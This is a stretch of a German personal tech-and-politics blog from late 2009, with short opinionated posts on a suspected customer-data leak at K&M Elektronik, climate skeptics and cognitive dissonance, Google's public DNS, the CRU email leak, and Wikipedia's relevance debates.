[l] Ein paar Freunde von mir haben auf ihre K&M-Email-Adressen Spam gekriegt. Bei Email gibt es Namensräume, z.B. bei sendmail würde foo+bar@fnord.de auch bei foo@fnord.de in der Mailbox rauskommen, und bei qmail kann man das noch feingliedriger verwalten. Viele Nerds vergeben daher pro Webseite, die auf der Eingabe einer Email-Adresse besteht, eine eigene Adresse. Wenn dann Spam kommt, kann man sehen, wo die Spammer die Adresse herhatten, und man kann genau diese Adresse zumachen, um den Spam loszuwerden. Einige Freunde von mir haben genau das bei K&M Elektronik gemacht und jetzt auf ihre Einmal-Adressen Viagra-Spam gekriegt.
Das kann mehrere mehr oder weniger unerfreuliche Dinge bedeuten. Hier sind die Optionen, die mir spontan einfallen: Vielleicht hat K&M die Kundendaten an Spammer verkauft, oder ein Mitarbeiter hat die Datenbank veruntreut, oder jemand hat sich bei denen reingehackt und die Datenbank kopiert. Das ist natürlich alles nicht schön für K&M, weil deren Datenschutzerklärung das ausschließt und sie sich auch irgendwelche "Sicher online shoppen" Zertifikate geholt haben.
Wenn das jetzt nur einem Freund passiert wäre, könnte man noch Hypothesen wie "der Spammer hat die Adresse geraten" aufstellen, aber es gibt da ein halbes Dutzend betroffene Email-Adressen.
Meine Freunde haben natürlich mal nachgefragt bei K&M und alle denselben "wir werden das untersuchen" Textbaustein zurückgekriegt, dann Funkstille. Das war vor ca. zwei Wochen.
K&M scheint das Problem also aussitzen zu wollen. Daher mache ich das jetzt mal publik.
Ich persönlich bin seit Jahren kein Kunde mehr bei K&M, seit die ein paar anderen Freunden ihre kaputte Grafikkarte (DOA) nicht umtauschen wollten. Keine Ahnung, ob ich bei denen noch in der Datenbank stehe, bei mir kam jedenfalls kein Spam auf die K&M-Adresse an.
Vielleicht gibt es ja auch eine ganz einfache, unschuldige Erklärung. Mal schauen, ob K&M da doch noch Aufklärungsbedarf sieht, wenn die Sache ein bisschen Öffentlichkeit hat.
Update: Jetzt kommen hier Mails von anderen Betroffenen rein, und mehrere vermuten, man habe über den Webserver Dinge abrufen können. Einer meinte, man habe unter http://www.kmelektronik.de/backup/ Daten zugreifen können; jetzt ist da jedenfalls nichts mehr, insofern kann ich das nicht prüfen, ob da mal was war. Archive.org und der Google Cache haben nichts, daher kann ich die URL wohl nennen hier.

Mon Dec 7 2009

[l] Weil hier tatsächlich Mails ankommen, die mir erklären wollen, dass CO2 gar kein Treibhausgas ist (nein, wirklich!!), habe ich heute einen schönen Link mit einem Video eines Experimentes für euch. Das ist einfach genug, dass Klimaskeptiker es zuhause nachbauen können.
Dann kommen diverse Strohmänner, die die Aussage angreifen, der Mensch sei (haupt-)ursächlich an der Klimaveränderung schuld. Das habe ich nie gesagt. Meines Wissens besteht auch daran kein wissenschaftlicher Zweifel, nur damit mich jetzt keiner falsch versteht. Aber wer mich für Aussagen beschimpft, die ich nie gemacht habe, ist bei mir sofort für alle Zeiten untendurch, der muss gar nicht mehr versuchen, mir jemals wieder eine Mail zu schicken. Das ist eine der schnellsten Methoden, sich lebenslang zu disqualifizieren.
Also, Leute. Was euch da gerade passiert, das ist ein klassischer Mechanismus des menschlichen Gehirns. Das ist medizinisch untersucht und wird einem im Psychologiestudium im 1. Semester erklärt. Das Gehirn denkt nur partiell vor dem Handeln darüber nach, was für eine Handlung es gleich tun wird. Stattdessen redet das Gehirn uns das nur ein, dass das alles geplant war, und das ist ja auch die viel schönere Vorstellung. Wer will sich schon selber als nach Reflexen handelnden Roboter sehen, der seine Taten nicht vorher durchdenkt sondern nur rückblickend rechtfertigt. Tatsächlich ist ein Großteil unserer Handlungen schlicht Reflex oder Kurzschlußhandlung, und das Gehirn erklärt dann nach der Handlung, warum wir das gerade getan haben.
Der Effekt ist sogar noch spannender als das. Wenn das Gehirn ein paar Mal beobachtet hat, wie es etwas bestimmtes getan hat, ändert sich die Einstellung der Person so, dass die Tat rückblickend passt. Wenn jemand also ein paar Mal schwarzfährt, legt sich sein Gehirn erst eine Entschuldigung zurecht, wieso das rational und gut war, und fängt dann bei Wiederholung an, das zur generellen Strategie zu machen. Man könnte es professionelles Selbstbelügen nennen.
Was hat das mit Leugnern der Klimaveränderung zu tun? Sie fallen genau auf diesen Mechanismus herein. Wer sich einmal auf die falsche Handlungs-Straße begeben hat, dessen Gehirn arbeitet ab dann auf Hochtouren daran, die Handlungen rückblickend in Konsonanz mit seinen anderen Gefühlen und Einstellungen zu bringen. Erstens, wenn jemand zwanzig Jahre ein Auto hat, dann ist es für denjenigen besonders schwierig, die Idee mit seiner Erfahrung in Konsonanz zu bringen, dass Autofahren schlecht für die Umwelt ist. Genau so ist es bei Rauchern.
Natürlich gilt das auch umgekehrt. Nachdem ich mich davon überzeugt habe, dass CO2 ein Treibhausgas ist, und Geld für Solarzellen ausgebe oder mich in meinem Blog aus dem Fenster gelehnt habe, wäre auch für mich eine Kurskorrektur besonders schwierig. Bei mir äußert sich das so, dass ich echte, tatsächliche, nachprüfbare, wissenschaftliche Beweise brauche, dass CO2 kein Treibhausgas ist. Nicht einmal die Aussage, dass andere Treibhausgase schlimmer sind, würde mich überzeugen, weil dann immer noch gelten würde, dass wir auch gegen CO2 vorgehen müssen.
Das, was jeder für sich verstehen muss, ist: auch für mich gilt dieser Mechanismus. Auch ich tue irrationale Dinge, und mein Gehirn rechtfertigt das dann danach mir gegenüber.
Und wenn man das verstanden hat, muss man sich selbst bei jedem seiner Argumente fragen, ob das jetzt eigentlich ein rationales Argument ist oder nur für mich gerade so aussieht, weil mein Gehirn es erfunden hat und es mir gegenüber daher grundsätzlich als rational erscheinen läßt.
Leider geschieht das nicht oder kaum. Mir mailen Leute z.B. Dinge zu, die beweisen sollen, dass auch die Klimaforscher mit Leuten von den Ölkonzernen zusammenarbeiten. Für denjenigen, der mir das gemailt hat, was das bestimmt ein total rationales Gegenargument gegen die Verschwörungstheorie, dass Big Oil uns für ihre kurzfristigen Profite in den Klimatod schickt. Die eigentliche Frage, ob nämlich CO2 ein Treibhausgas ist, und wir den Ausstoß reduzieren sollten, um die Lage nicht noch schlimmer zu machen, oder ob wir nicht sogar CO2 aus der Luft ziehen sollten, um unsere bisherigen Emissionen rückgängig zu machen, ist von diesem scheinrationalen Metaargument völlig unberührt. Und bei mir kommt sowas daher an wie ein völlig verwirrter Kläffer, der gerade mit seiner kognitiven Dissonanz kämpft.
Ein anderer schrieb mir, dass das doch nur gut für Big Oil ist, wenn CO2-Emissionen teuer werden, weil dann Öl teuer wird. Das könnt ihr euch ja mal selber überlegen, ob mich dieses Argument überzeugt haben wird oder nicht.
Dann gab es noch Zuschriften, die mir erklären wollten, dass der ganze Klima-Hokuspokus doch nur eine Strategie der 1. Welt sei, um die 3. Welt kleinzuhalten. Aha. Und … deshalb senken wir jetzt unsere Emissionen lieber doch nicht, oder wie?
Einer schrieb mir sogar, dass EM-Strahlen von Handymasten doch auch die Erde erwärmen würden.
Also, nochmal langsam zum mitschreiben. Versteht, wie euer Gehirn funktioniert. Lest euch noch mal diese Vortragsfolien und den Wikipedia-Artikel durch und reflektiert da mal in Ruhe drüber. Klickt auch die Links, insbesondere den hier. So funktionert unser Gehirn. Und ja, das wird auch aktiv gegen uns eingesetzt, um uns Produkte zu verkaufen. Lernt das. Das ist wichtig. Um nicht zu sagen: wenige Erkenntnisse über uns selber sind so wichtig wie diese.
Und in Zukunft, bevor ihr mir Mails schreibt, die mich mit nicht überzeugenden Argumenten zu überzeugen versuchen: lest euch die Mails nochmal selber durch, und überlegt euch in Ruhe, ob ihr mir da wirklich gerade in überzeugendes Argument mitteilt oder nicht. Das kann man selber herausfinden und erkennen, aber man muss aktiv Aufwand dafür treiben. Das Gehirn selber findet die Argumente natürlich völlig rational, wenn man sie nicht noch mal hinterfragt.
Update: Jetzt kommt gerade die eine Zuschrift, wo mich jemand wütend beschimpft, weil sie glaubt, meine Ausführungen zum Funktionieren des Gehirns hätten das Ziel, ihr eine Geisteskrankheit zu unterstellen. Wow. Da sieht man mal, dass es allerhöchste Eisenbahn war, das Thema hier mal anzusprechen. Im Übrigen, um das noch mal klar zu sagen: das ist nicht Fefes Verschwörungstheorie zum Gehirn hier gerade, das ist die wissenschaftliche Erkenntnis. Ihr sollt mir das nicht glauben, ihr sollt das nachrecherchieren, und daraus Erkenntnis über euch und euer Gehirn gewinnen.
Update: Schöner Cartoon zum Klimawandel

Sat Dec 5 2009

[l] Wer dachte, bei uns sei Telefon und Email teuer, der muss mal nach England gucken. Dort hat das Kriegsministerium gerade ihre UFO-Meldehotline zugemacht.
Der letzte verbliebene Mitarbeiter wurde in eine andere Abteilung versetzt, die Hotline und die E-Mail-Adresse abgeschaltet. Dadurch spart das Ministerium jedes Jahr rund 50.000 Euro.
Äh, die haben den versetzt, nicht gefeuert, die Einsparung kommt also nicht von seinem Gehalt. Die geben da für eine Telefonnummer und eine E-Mail-Adresse 50.000 Euro im Jahr aus?!? Wow.

Fri Dec 4 2009

[l] So, Google bietet jetzt einen öffentlichen DNS-Service an. Unter der gut merkbaren IP 8.8.8.8. Natürlich ruft das diverse Verschwörungstheoretiker auf den Plan, und die Privatsphäreimplikationen sind natürlich nicht gut, weil man so bei Google sozusagen Internet-Bewegungsdaten hinterlässt.
Auf der anderen Seite ist das ein kraftvoller Präventivschlag in Sachen Netzneutralität. Wenn ihr Provider unser DNS manipuliert, dann nehmen wir eben das von Google. Und Google hat natürlich Recht, wenn sie davon reden, dass das die Performance des Surfens verbessern kann — weil so nur der erste in einer Trend-Herde bei ihnen tatsächlich Arbeit auslöst, die anderen kriegen es alle aus dem Cache. Verteiltes Web-Cachen wäre der nächste Schritt, und ich erinnere mich dunkel, dass sie das auch mal probiert hatten. Das kommt bestimmt wieder. Google ist in der so gut wie einmaligen Position, dass sie für ihr Internet nichts zahlen. Jeder hätte mehr Nachteil davon, nicht zu Google verbinden zu können, als Google davon Nachteil hätte. Und so ermöglicht denen "Bandbreitensau"-Geschäftsmodelle, von denen andere nur träumen können.
Insgesamt halte ich das für einen schlauen Schachzug, weil es den Providern deutlich zeigt, dass sie nur Commodity-Zulieferer sind. Die sollen sich mal gar nicht einbilden, da "Mehrwertdienste" anbieten zu können, ihre Aufgabe ist das möglichst billige Verfügbarmachen von rohem Internet. Nicht mehr und nicht weniger.
Der einzige wirklich üble Datenschutzaspekt wäre, dass die Server in Amerika stehen, und daher für die dortigen Behörden zugreifbar und abschnorchelbar sind. Allerdings, wenn ich hier von meinem Kabel Deutschland Internet zuhause aus 8.8.8.8 pinge, kriege ich eine Round-Trip-Zeit von um die 8-12 Millisekunden. Zum Vergleich: wenn ich blog.fefe.de pinge, kriege ich so um die 45 ms. Es ist also völlig offensichtlich, dass Google hier per anycast arbeitet und die in Deutschland sichtbaren Server auch in Deutschland oder zumindest Europa stehen.
Zum Vergleich: Wenn ich die DNS-Server meines Providers (!) pinge, komme ich auf 8-9 ms. Google ist hier also ähnlich gut angebunden wie die interne Infrastruktur meines Providers.
Das alleine lässt schon tief blicken, wie ernst sie das meinen. Ein Kumpel bei Alice hat sogar geringere Latenz zu Google als zu dem Alice-DNS.
Für Google ist das natürlich hilfreich, diese Daten zu haben, weil sie so Trends schnell erkennen können und potentiell Sites neu spidern können, wenn die einen unerwarteten Last-Peak haben. Oder für deren Reichweiten-Abschätzung von Websites.
Benutze ich Google DNS? Nein. Ich habe einen eigenen DNS-Resolver. Aber man weiß ja nie, wann man das mal brauchen kann. Und Google könnte da auch mal eben IPsec oder dnscurve anbieten, wenn sie wollten.
Unter dem Strich ist das im Moment ein klarer Gewinn für das Internet. Wie es eigentlich immer ein klarer Gewinn ist, wenn jemand kostenlos Infrastruktur hinstellt. Kris hat sich dazu auch Gedanken gemacht.

Wed Dec 2 2009

[l] Die Somali-Piraten bieten jetzt "Unternehmens"beteiligungen an, um ihre Exkursionen zu finanzieren. Reuters spricht sogar von einem Stock Exchange, also einer Börse.
"Four months ago, during the monsoon rains, we decided to set up this stock exchange. We started with 15 'maritime companies' and now we are hosting 72. Ten of them have so far been successful at hijacking," Mohammed said.
Wow. Er sagt dann noch, er habe Piraterie zu einer "Community Activity" gemacht. Im Übrigen zahlt da die Piraterie für fast alles, und die eigentliche Regierung hat keinerlei Einfluß. (Danke, Michael)

Tue Dec 1 2009

[l] So, Sendung vorbei, hier gibt es einen Torrent des Ogg-Vorbis-Mitschnitts von Smiddi. Die Sendung lief deutlich anders, als ich sie mir vorgestellt hätte, hat aber großen Spaß gemacht. Und wieder was gelernt, nämlich dass die Uni Magdeburg einen Homöopathie-Studiengang anbietet. Wow. Ob sich Herr von Guericke jetzt im Grab umdreht?
Update: Jetzt ist die Sendung auch als MP3 von Fritz downloadbar.
Update: Bei smiddi ist der Torrent weg, dafür liegt da jetzt direkt die .ogg-Datei

Mon Nov 30 2009

[l] Oh wie fies und gemein! Die Süddeutsche hat sich mal die Doktorarbeit der Frau Familienministerin angeguckt. Und wie böse sie zu dieser armen Frau sind!
Im Wissenschaftsjargon ist das eine klassische Typ-II-Arbeit. Typ I wären Arbeiten, die inhaltlich wirklich etwas Neues zutage befördern und damit dem Autoren eine wissenschaftliche Karriere eröffnen. Zum Typ II zählen solche Arbeiten, bei denen das erste Ziel der Titel ist.
Im weiteren Verlauf wird die Arbeit dann als "vergleichsweise einfach gestrickt" bezeichnet und … naja, lest selbst. Lange hat niemand mehr einen Doktortitel so deutlich verdient wie Frau Köhler. Sie musste nicht mal ihre Fragebögen selber verschicken, das haben Mitarbeiter des Konrad-Adenauer-Hauses für sie gemacht. Die Fragebögen hat sie sich per "Mini-Job" von einem WiMi machen lassen, der auch die Daten in den Computer eingegeben und die Dissertation komplett layoutet und formatiert hat.
[l] Das ehemalige Nachrichtenmagazin macht gerade ernsthaft eine Umfrage, ob wir auch Minarette verbieten sollen und ein paar Nazi-Webseiten haben das offensichtlich gekapert. Der aktuelle Stand ist: 77,55% für ein Minarettverbot, 20,14% dagegen.
Mal abgesehen davon, dass da die "organisierte Religionen generell verbieten" Option fehlt, ist das natürlich eine Schande für alle Nicht-Nazis, dass es soweit gekommen ist in dieser Umfrage. Daher sollten sich jetzt alle Nicht-Nazis aufgerufen fühlen, diese Umfrage zu korrigieren. Und dass sich das ehemalige Nachrichtenmagazin für diese Rassismus-Kampagne mißbrauchen läßt, das ist eine Schande.
Übrigens ist auch der Schweiz aufgefallen, dass sie da gerade vor allem von Nazis aus dem Ausland Applaus kriegen.
Update: Mir mailt gerade jemand, dass die die Cookies nutzen, um Duplikate zu erkennen. Nur falls sich jemand Sorgen gemacht hat, dass "Politically Incorrect" wirklich 20.000 Leser haben könnte. Nein, keine Sorgen. Eher so 20 plus Sockenpuppen.
Update: Oh wow, die Umfrage ist plötzlich weg. Das ging ja schnell. In nur fünf Minuten haben wir das ehemalige Nachrichtenmagazin genug beschämt!

Fri Nov 27 2009

[l] Ich bin kein Anwalt, und verstehe von den Details immer nur die Hälfte, aber ich habe den Eindruck, dass sich bei dieser Angelegenheit hier gerade eine epische Geschichte entwickelt. Es geht um den Rechtsanwalt Stadler, der die DigiProtect-Raubkopiererjäger offensichtlich so im Mark getroffen hat, dass sie ihn jetzt mit einer Abmahnung mit einem Streitwert von 250.000 Euro wegzuekeln versuchen. Der Stadler hat geschrieben, was ja an sich die meisten Beobachter seit Jahren vermuten, nämlich dass es beim Jagen der Raubkopierer um ein Geschäftsmodell und nicht um das Durchsetzen der Rechte der armen gebeutelten Rechteinhaber geht.
Die ganze Masche steht und fällt mit dem Detail, dass die in Rechnung gestellten Gebühren nicht als Strafe gemeint sind, sondern als Erstattung der ansonsten vom Rechteinhaber zu tragenden Kosten. Wenn eine Abmahnung nicht zum Ziel führt, z.B. weil der Abgemahnte unschuldig war oder am Existenzminimum lebt und nicht zahlen kann und man auch nichts pfänden kann, dann zahlt der Rechteinhaber die Anwaltskosten. Diese Regelung soll verhindern, dass der Streitwert willkürlich zu hoch gesetzt wird, oder dass eine freidrehende Kanzlei tausende von Menschen nach der Schrotflinten-Methode abmahnt, und dann jeweils das "Risiko" übernimmt, dass eine einzelne Abmahnung nicht läuft. Für die Kanzlei ist das ja kein echtes Risiko, die zahlen ja nur einmal ein Blatt Papier, ein paar Cent für das Ausdrucken, und das Porto. Der Stadler hatte jetzt ein Indiz dafür gefunden (auf Wikileaks übrigens), dass dieses Risiko eben nicht vom Rechteinhaber sondern von der Kanzlei getragen wird, und wenn dem so wäre, dann könnte jeder Abgemahnte die Zahlung der Gebühren verweigern. Das trifft also das Herz des Geschäftsmodells, so es denn eines ist. Schlimmer noch, dann könnte man auch anfangen, von Betrug und unzulässigen Massenabmahnungen zu reden und sich bei der Anwaltskammer über die Anwälte zu beschweren, und dann würde theoretisch Ärger bis zum Berufsverbot drohen. Kurz gesagt: das ist ein existenzielles Problem für die betroffene Kanzlei. Da würde man also denken, dass die direkt mit einer Klage wegen Geschäftsschädigung, übler Nachrede oder was auch immer da in Frage kommt reagiert. Tun sie aber nicht. Sie schicken eine Abmahnung. Daher glaube ich ja, dass die nicht wirklich wollen, dass das vor Gericht landet.
Nun greift so eine Abmahnung bei normalen Menschen als Bedrohung, aber nicht bei Anwälten. Anwälte verstehen ja die Risiken und Drohungen viel besser als Laien, und dementsprechend strahlt der Herr Stadler da auch im Moment gar keine große Panik aus sondern legt sogar noch einen drauf und spricht bezüglich DigiProtect von einem "unlauteren Geschäftsmodell".
Warum glaube ich jetzt, dass das ein Epic Fail für die Raubkopierer-Inkassobranche werden könnte? Weil auch der RA Kompa und der RA Vetter dazu bloggen und beide auf Seiten von RA Stadler zu stehen scheinen. Ich hoffe daher auch mal heimlich, dass es zu einem Verfahren kommt, und dieses Geschäftsmodell an der Stelle rückstandsfrei beerdigt wird.
Wahrscheinlich habe ich jetzt die Details nicht sauber dargestellt, glaubt im Zweifelsfall den verlinkten Anwälten und nicht mir. Die Materie ist ja doch diffizil :-)
Oh, sehr spannend auch, worauf Udo Vetter hinweist: die Echtheit des Wikileaks-Dokumentes bestreitet immer noch niemand.

Wed Nov 25 2009

[l] Malte Spitz von den Grünen hat mal ein Projekt gemacht, wo er die Leute aufgefordert hat, Einblick in ihre Verbindungsdaten zu fordern. Nun stellt sich raus, dass dieser Einblick regelmäßig verweigert wird.
Das Auskunftsrecht besteht nämlich nach § 34 Abs. 4 i.V.m. § 33 Abs. 2 Satz 1 Nr. 3 BDSG dann nicht, wenn die Daten nach einer Rechtsvorschrift oder ihrem Wesen nach, namentlich wegen des überwiegenden rechtlichen Interesses eines Dritten, geheim gehalten werden müssen. Dies ist hier regelmäßig der Fall, wie nachstehend erläutert wird.
Und dann kommt das hanebüchenste Argument, das ich überhaupt je gehört habe. Man müsse hier die Interessen des Kommunikationspartners schützen. Ja, meine Damen und Herren! Ihr dürft wegen des Datenschutzes nicht auf eure Vorratsdaten zugreifen! Mir fällt gerade kein anderes Land ein, wo es zu einer so grotesken Regelung kommen kann.
[l] Die SPD ist jetzt bei 19%. Damit ist das Projekt 18 in greifbare Nähe gerückt. Kommt, SPD, das schafft ihr. Und danach machen wir dann das Projekt 4,9. Und irgendwann wird euch auffallen, dass keiner eine Umfallerpartei braucht, die es sich im Hintern der CDU bequem gemacht hat.

Sun Nov 22 2009

[l] Bei Hal Faber gibt es mal wieder einen echten Kracher zur Gesundheitskarte:
Das elektronische Rezept, der Heilsbringer des neuen Systems, wird derzeit durch Debatten um zweidimensionale Barcode-Informationen auf dem Papierrezept ersetzt, den der Arzt druckt und der Apotheker bruchlos in seine IT einlesen kann. Das ist ein Vorschlag, den der Chaos Computer Club vor vier Jahren gemacht hatte und der seinerzeit als Billiglösung nur belächelt wurde. So mancher Fortschritt ist ein echter Rückschritt.
Ach nee! Da waren wir wohl mal wieder unserer Zeit voraus :-)

Sat Nov 21 2009

[l] Jemand hat den Server der Klimaforschungsgruppe an der East Anglia University aufgemacht und die Emails veröffentlicht. Und zwar nicht nur ein paar, sondern insgesamt 160 MB, auch mit Word- und Powerpoint-Dokumenten. Und die Details sind nicht schön. Da findet man dann z.B. Überlegungen, wie sie mit Informationsfreiheitsanfragen von Kritikern umgehen sollen, man könnte ja z.B. die zusammengeführten Daten wieder auseinanderführen, um die zu ärgern. Und es finden sich Statements, die danach klingen, als würden sie Tricks austauschen, um ihre Daten gemäß ihren gewünschten Aussagen zu massieren. Das ist alles sehr, sehr unerfreulich. Leider kann man sich da gar nur mit ein bisschen Tiefgang auf Sites informieren, die sich vorher durch Aussagen wie "aber die Gletscher schmelzen doch gar nicht so schnell!1!!" ins Abseits geschossen haben, und ansonsten ganztägig von Klimabetrug u.ä. reden. Die Datei heißt foi2009.zip und das Institut heißt Climate Research Unit. Könnt ihr ja mal googeln. Die Universität hat offiziell zugegeben, dass sie einen Vorfall hatten, und hat wohl alle einmal die Passwörter ändern lassen. Aber sie will nicht die Echtheit der zirkulierenden Dateien bestätigen. Und natürlich ist das auch sehr unschön, würde ich ja auch nicht machen wollen, wenn jemand meinen Mailspool auf einen russischen Server hochgeladen hätte.
Die New York Times zitiert ein paar Stellen.
Update: Telepolis verweist auf diesen Artikel eines Betroffenen.
[l] Zu dem Verfassungsgerichtsurteil neulich: ich tendiere inzwischen dazu, dass das ein Fehler war. Ich bin eh schon immer der Meinung gewesen, dass man das Nazi-Problem schlimmer macht, wenn man ihnen nicht erlaubt, ihre Lügen zu verbreiten, weil man dann nicht mitkriegt, wo sie sie verbreiten, und sie dann auch nicht klarstellen kann. Ich wohne allerdings auch nicht in Wunsiedel und habe jedes Verständnis dafür, dass die die nicht durch ihr Dorf marschieren lassen wollen.
Letztlich muss sich da natürlich jeder selbst seine Meinung bilden, ich möchte dazu etwas weitergeben, was mir padeluun gemailt hat: ein ehemaliger Verfassungsrichter erklärt hier in einem DLF-Interview, wieso er anders entschieden hätte.

Fri Nov 20 2009

[l] So, liebe Zielgruppe, ich hatte ja neulich angekündigt, dass ich über Werbung nachdenke, weil ich gerne ein bisschen Kohle reinkriegen will für den Aufwand, den ich mir hier mache. Das fand wenig überraschend kaum jemand toll, und viele wollten lieber spenden. Ich habe ja nichts gegen Spenden, aber da müsste es eine Methode geben, wie man das über einen vertrauenswürdigen Dienstleister ala Paypal macht, nur halte ich Paypal eben nicht für vertrauenswürdig.
Die andere Möglichkeit sind Partnerprogramme, und da gerade Weihnachten ist und es wieder kalt wird und alle was zum Anziehen brauchen, habe ich da mal mit zwei coolen Nerd-Bekleidungsversendern einen Deal gemacht, 3dsupply und getdigital. Beide haben auch ein Lostret-Angebot, bei dem man ein T-Shirt für lau oder sehr wenig mitbestellen kann, bei 3dsupply ist es "Wo bleibt eigentlich die Revolution" und bei getdigital kriegt man "WTF? Was taete fefe" für nur einen Euro. Als Mitbestellshirts werdet ihr schon was schönes finden, die haben beide ein breites Angebot. Bei getdigital hat mir z.B. "Willfähriges Mitglied des Fefe-Zeitbinder-Botnets" sehr gut gefallen, und 3dsupply hat ein "Mein Freund ist Wiki-Blockwart" Herzchen-Shirt :-)
Also ich denke mal, für die passende Congress-Kleidung ist damit gesorgt, und ich kann mit der Kohle mal zumindest die laufenden Kosten decken, und vielleicht auch mal schön mit Freunden essen gehen. Mal schauen, wie gut das läuft.
Update: Mhh, so gut wie das bei der Wikipedia neulich lief, könnte ich euch auch einfach alle mal vor den Kopf stoßen und einen Spendenticker einrichten :-)

Wed Nov 18 2009

[l] Jemand hat dem Holocaust-Lügner David Irving das Emailkonto aufgemacht. Und da stehen die ganzen Tarnnamen drin, unter denen er so Hotels bucht und Veranstaltungen plant.

Mon Nov 16 2009

[l] Oh YES! Der Hacker des Tages ist: Muammar al-Gaddafi, weil er die Weltpresse gehackt hat. Er weilte zum Welternährungsgipfel ein paar Tage in Italien und hat sich da für eine Party 500 schnuckelige Italienerinnen ("angenehme Erscheinung, mindestens 1,70 Meter groß, gut angezogen") zusammensuchen und einladen lassen. Die versammelte Presse freute sich schon auf eine fette Orgie, eine zügellose Party, Wein, Weib und Gesang, aber was hat Gaddafi gemacht? Eine Koranlesestunde. BWAHAHAHAHA

Sun Nov 15 2009

[l] Neben den Jubelpersern aus der Polizeischule gibt es noch ein Detail zu den 20-Jahre-Mauerfall Festivitäten, die uns alle peinlich berühren sollte. Das Brandenburger Tor war für den Pöbel gesperrt.
Durch das Brandenburger Tor durften die Menschen nach der umjubelten Aktion trotzdem noch nicht gehen. "Das Brandenburger Tor kann aus Sicherheitsgründen noch nicht geöffnet werden", hieß es in einer Durchsage.
Ja, richtig gelesen. Wir haben das 20jährige Jubiläum der Öffnung des Brandenburger Tors gefeiert, indem wir es zugemacht haben.
[l] Nachdem ich jetzt noch mal einen Tag reflektiert habe, möchte ich noch ein paar Beobachtungen zur Wikipedia bloggen. Wir haben jetzt mit einigen Wikipedianern gesprochen, und eine Beobachtung habe ich dabei gemacht, die ich gerne mit euch teilen möchte. Das Gespräch läuft üblicherweise sehr ähnlich ab. Es werden die üblichen Argumente auf den Tisch getan, die wir ja auch alle schon gehört haben.
Relevanz ist doch aber wichtig, weil sonst Oma Marta einen Artikel zu ihrem Hund reinstellen würde, und wo kämen wir dann hin. Und wie ist das mit den Pokemons? Die haben wir reingelassen, und jetzt sehen wir ja, was wir davon haben! Da kommen jetzt Leute und wollen zu jedem Pokemon eine eigene Seite! Zu jedem! Eine eigene Seite!!
An der Stelle kommt von mir dann gewöhnlich die Frage, was denn daran so schlimm wäre. Ich kann das auch ernsthaft nicht nachvollziehen, wo da das Problem ist. Wenn wir uns einig sind, dass die Seiten unrelevant sind, wem schaden sie dann? Dann klickt doch eh keiner drauf, wenn sie unrelevant sind. Dann kann da auch unwichtiger Kram stehen.
Wegen der Relevanzkriterien möchte ich mal ein konkretes Beispiel nennen. Über das Artikelsterben habe ich vor ein paar Tagen gesehen, dass es einen Löschantrag für Adämonisten gibt. Inzwischen steht da, es handele sich um einen Urheberrechtsverstoß. Gut, das ist eine Sache, die ich als Grund akzeptiere. Aber vor ein paar Tagen standen da drei Zeilen Text. Wenn ich mich recht entsinne, entsprach der Text weitgehend der Wortdefinition auf dieser Seite. Ich finde diesen Eintrag ein tolles Beispiel für Relevanzdiskussionen. Es handelt sich hier um einen Begriff, der von Wissenschaft und Ratio nicht weiter entfernt sein könnte, und bei dem Quellenangaben sinnlos sind. Es geht um Vampire, Dämonen und Astralkörper. Völliger Mumpitz also in meinem Weltbild. Trotzdem wäre diese Definition des Begriffes genau das, was ich dazu in der Wikipedia erwarten würde. Mein Benutzungsmuster für die Wikipedia ist, dass ich irgendwo auf ein Wort treffe, das ich nicht kenne oder bei dem mein Verständnis der Wortbedeutung in dem Kontext keinen Sinn hat. Dann laufe ich zur Wikipedia und gucke nach. Und wenn ich dort die obige Definition finde, hat mir die Wikipedia geholfen. Und zwar deutlich mehr, als wenn jemand für mich entschieden hat, dass Adämonisten Mumpitz ist und in der Wikipedia nichts verloren hat. Denn, bei aller Freundschaft, diese Entscheidung kann und will ich selber treffen. Genau wie ich nicht möchte, dass meine Regierung für mich entscheidet, welche Nachrichten oder Bücher für mich relevant sind. Und, mal unter uns, wenn da was von Astralkörpern, Vampiren und Dämonen steht, dann brauche ich nicht eure Hilfe, um das als das zu erkennen, was es ist. Als Mumpitz.
Diese Runde endet dann gewöhnlich an der Stelle. Wikipedianer hatten an der Stelle bisher immer kognitive Dissonanz. Das ist eine Frage des Weltbildes. Im Wikipedia-Weltbild ist das ein Axiom, dass es schädlich ist, wenn unrelevante Artikel in der Wikipedia sind. Niemand kann ernsthaft der Meinung sein, dass das kein Problem sei. Wenn wir uns dann physisch gegenübersitzen und man an unserer Körpersprache erkennen kann, dass wir das ehrlich nicht für ein Problem halten, kollidieren Weltbild und Realität und kognitive Dissonanz setzt ein.
Nun ist ja nicht unerforscht, was in so einem Moment im Gehirn geschieht. Wenn man eine Kollision zwischen Weltbild und Realität hat, dann ist das meistens dadurch ausgelöst, dass man gerade einen Fehler gemacht hat. Das Gehirn fängt dann an, rückwirkend Erklärungen zu finden, warum man das gerade gemacht hat. Ähnliche Mechanismen treten an der Stelle üblicherweise in Kraft, und es kommen progressiv weniger überzeugende Argumente, wieso das schlecht wäre. Häufigstes Argument ist bisher, dass dann ja jeder Werbung reinstellen könnte, und dann würde Wikipedia ja zu einer kostenlosen Werbeplattform verkommen, und die Spender wären sauer, dass mit ihren Spenden eine Werbeplattform finanziert würde. Das Argument klingt ja erstmal ganz gut, aber es ist ein Strohmann. Denn wir sagen ja nicht, dass der Inhalt eines Lemmas nicht relevant sein muss. Wir sagen nur, dass für das Lemma selbst keine oder sehr lasche Relevanzkriterien gelten sollten. Wenn jemand Werbung oder Falschaussagen zu einem Lemma ins Netz stellt, dann sollen die natürlich weiterhin entfernt oder NPOV-konform umformuliert werden. Das ist ein orthogonales Problem. Aber gut, das ist letztlich eine Frage, bei der man geteilter Meinung sein kann.
Der Punkt, auf den ich die ganze Zeit eigentlich hinaus wollte, ist dieser: Als nächstes (und letztes) kommt dann, wir sollen doch mal konstruktive Gegenvorschläge machen.
